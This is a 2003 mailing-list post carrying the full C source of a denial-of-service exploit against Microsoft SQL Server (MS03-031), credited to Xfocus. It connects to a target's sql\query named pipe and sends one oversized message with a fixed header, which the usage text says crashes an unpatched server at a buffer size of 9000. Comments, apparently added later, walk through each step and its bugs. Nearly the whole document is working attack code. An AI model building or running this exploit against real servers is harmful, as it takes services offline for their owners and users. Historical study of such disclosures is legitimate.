exp for Microsoft SQL Server DoS(MS03-031) By Xfocus

From: benjurry (benjurryat_private)
Date: Fri Jul 25 2003 - 08:25:13 PDT


    ////////////////////////////////////////////////////////////////////////////////
    //      
    //      exp for Microsoft SQL Server DoS(MS03-031)
    //
    //      By		  : refdom
    //		Email	  : refdomat_private
    //		Home Page : http://www.xfocus.org
    
    //   http://www.xfocus.org/exploits/200307/expMS0331.cpp
    
    ////////////////////////////////////////////////////////////////////////////////
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <windows.h>
    
    
    // Print the tool's banner and command-line help to stdout.
    // The text is emitted line by line from a fixed table; none of the
    // lines contain a '%' conversion, so fputs produces exactly the same
    // bytes that a printf of each literal would.
    void Usage()
    {
    	static const char *const banner[] = {
    		"******************************************\n",
    		"exp for Microsoft SQL Server DoS(MS03-031)\n\n",
    		"\t Written by Refdom\n",
    		"\t Email: refdomat_private\n",
    		"\t Homepage: www.xfocus.org\n\n",
    		"Usage: DOSMSSQL.exe server buffersize\n",
    		// note: the example below lacks a space between the program
    		// name and the host; kept verbatim from the original text
    		"eg: DOSMSSQL.exe192.168.0.1 9000\n\n",
    		"The buffersize depends on service pack level.\n",
    		"I test it on my server: windows 2000, mssqlserver no sp.\n",
    		"when buffersize is 9000, the server can be crashed.\n",
    		"\n",
    		"*******************************************\n\n",
    	};
    	size_t count = sizeof banner / sizeof banner[0];
    
    	for (size_t idx = 0; idx < count; idx++)
    	{
    		fputs(banner[idx], stdout);
    	}
    }
    
    
    // Program entry point.
    //
    // argv[1] is a host name (fewer than 20 characters), argv[2] a byte count.
    // The program builds the UNC path of that host's "sql\query" named pipe,
    // opens it, switches the handle to message mode and writes a single
    // message of argv[2]+1 bytes whose first three bytes are 0x12 0x01 0x00
    // and whose remaining bytes are 'A'. It always returns 0, so the exit
    // status does not indicate whether any step succeeded.
    //
    // Windows-only: HANDLE, BOOL, DWORD, CreateFile, SetNamedPipeHandleState,
    // WriteFile and GetLastError come from <windows.h>. strlen/sprintf/memset
    // are used without an explicit <string.h>; presumably <windows.h> pulls it
    // in on the original toolchain -- verify before building elsewhere.
    //
    // Defensive relevance: this is the historical MS03-031 denial-of-service
    // condition named in the header; the affected servers were addressed by
    // that update, and the only network activity is one oversized message to
    // the SQL Server named pipe.
    int main(int argc, char* argv[])
    {
    	// Fixed-size path buffer. The sprintf below adds 20 fixed characters
    	// ("\\" prefix plus "\\.\pipe\sql\query"); with the host limited to
    	// 19 characters the result is at most 39 characters plus NUL, so it
    	// fits in 50 bytes.
    	char lpPipeName[50];
    	char *lpBuffer = NULL;          // heap message buffer, ulSize + 2 bytes
    	unsigned long ulSize = 0;       // payload length taken from argv[2]
    
    	BOOL bResult;
    	DWORD dwWritten = 0, dwMode;    // dwWritten is filled by WriteFile but never read
    	HANDLE hPipe;
    
    	Usage();
    
    	printf("Starting...\n");
    
    	// Wrong argument count exits silently (the banner above is the only hint).
    	if (argc != 3)
    		goto Exit0;
    	
    	if (strlen(argv[1]) < 20)
    	{
    		// Runtime form: \\<host>\\.\pipe\sql\query
    		sprintf(lpPipeName, "\\\\%s\\\\.\\pipe\\sql\\query", argv[1]);
    	}
    	else
    	{
    		printf("Error!server\n");
    		goto Exit0;
    	}
    
    	// NOTE(review): atol reports no error. A non-numeric argument yields 0,
    	// and a negative value converts to a very large unsigned long, so the
    	// ulSize + 2 arithmetic below can wrap and the memset lengths no longer
    	// match the allocation. With ulSize == 0 the allocation is 2 bytes but
    	// the store to lpBuffer[2] below writes a third byte.
    	ulSize= atol(argv[2]);
    
    	lpBuffer = (char*)malloc(ulSize + 2);
    	if (NULL == lpBuffer)
    	{
    		printf("malloc error!\n");
    		goto Exit0;
    	}
    
    	// Zero the whole allocation, fill the first ulSize bytes with 'A',
    	// then overwrite the first three bytes with the fixed header bytes.
    	memset(lpBuffer, 0, ulSize + 2);
    	memset(lpBuffer, 'A', ulSize);
    	*lpBuffer = '\x12';
    	*(lpBuffer + 1) = '\x01';
    	*(lpBuffer + 2) = '\x00';
    	
    	printf("Connecting Server...\n");
    
    	// Open the existing pipe for read and write with no sharing.
    	hPipe = CreateFile(lpPipeName, 
    					GENERIC_READ | GENERIC_WRITE,
    					0,
    					NULL,
    					OPEN_EXISTING,
    					0,
    					NULL);
    	if (INVALID_HANDLE_VALUE == hPipe)
    	{
    		printf("Error!Connect server!%d\n", GetLastError());
    		goto Exit0;
    	}
    
       // Switch the client end to message read mode; byte limits and the
       // timeout are left unchanged (NULL).
       dwMode = PIPE_READMODE_MESSAGE; 
       bResult = SetNamedPipeHandleState( 
          hPipe,    // pipe handle 
          &dwMode,  // new pipe mode 
          NULL,     // don't set maximum bytes 
          NULL);    // don't set maximum time 
       if (!bResult)
       {
    		printf("Error!SetNamedPipeHandleState.%d\n", GetLastError());
    		goto Exit0;
       }
    
    	// One write of ulSize + 1 bytes: the header plus the 'A' fill
    	// (the final zero byte of the allocation is not sent).
    	bResult = WriteFile(hPipe, lpBuffer, ulSize + 1, &dwWritten, NULL);
    
    	if (!bResult)
    	{
    		printf("\n\tError!WriteFile.%d\n\n", GetLastError());
    		printf("When see the error message, the target may be crashed!!\n\n");
    		goto Exit0;
    	}
    
    // Single exit label. NOTE(review): hPipe is never closed with CloseHandle
    // and lpBuffer is never freed; both are reclaimed only by process exit.
    Exit0:
    	
    	return 0;
    }
    


